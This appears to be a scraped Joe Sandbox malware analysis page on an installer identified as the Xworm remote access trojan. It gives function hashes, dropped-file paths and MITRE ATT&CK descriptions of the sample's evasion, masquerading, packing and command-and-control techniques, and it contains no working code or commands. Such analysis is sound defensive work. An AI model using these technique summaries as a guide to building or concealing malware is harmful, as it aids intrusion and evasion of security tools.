Opcode Fuzzy Hash: ec8e38cc0de280e16c37f3b88ee8e6ef127f2552cc377a6e1a3593562aa6f3ff
Instruction Fuzzy Hash: 560175323006516BDB24DE6CDCC0AABB3B6EBC57507204E3DE6818B645DB70ECD587A4

Function 00A17AB9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A14895: __getptd.LIBCMT ref: 00A1489B
Part of subcall function 00A14895: __getptd.LIBCMT ref: 00A148AB

__getptd.LIBCMT ref: 00A17AC8

Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC

__getptd.LIBCMT ref: 00A17AD6

Strings

csm, xrefs: 00A17AE4

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction ID: 08a1270845a76586ddf74e637651ca72abf1499deb7875ee2eb10ac4a2008392
Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction Fuzzy Hash: E501623980D205CFCF349F26C5486EDB3BAEF18321F24682DE042565A1CB309DC1CB11

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 998_popxinv_Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Downloads\ind.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
998_popxinv_Installer.exe

Function 00A111E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Function 00A12E5A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Function 00A12E55 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Function 03ADFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 00A1297C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Function 03AE00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Function 00A12F3A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Function 03ADFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Function 00A15902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Function 05FA75E0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Function 00A11848 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON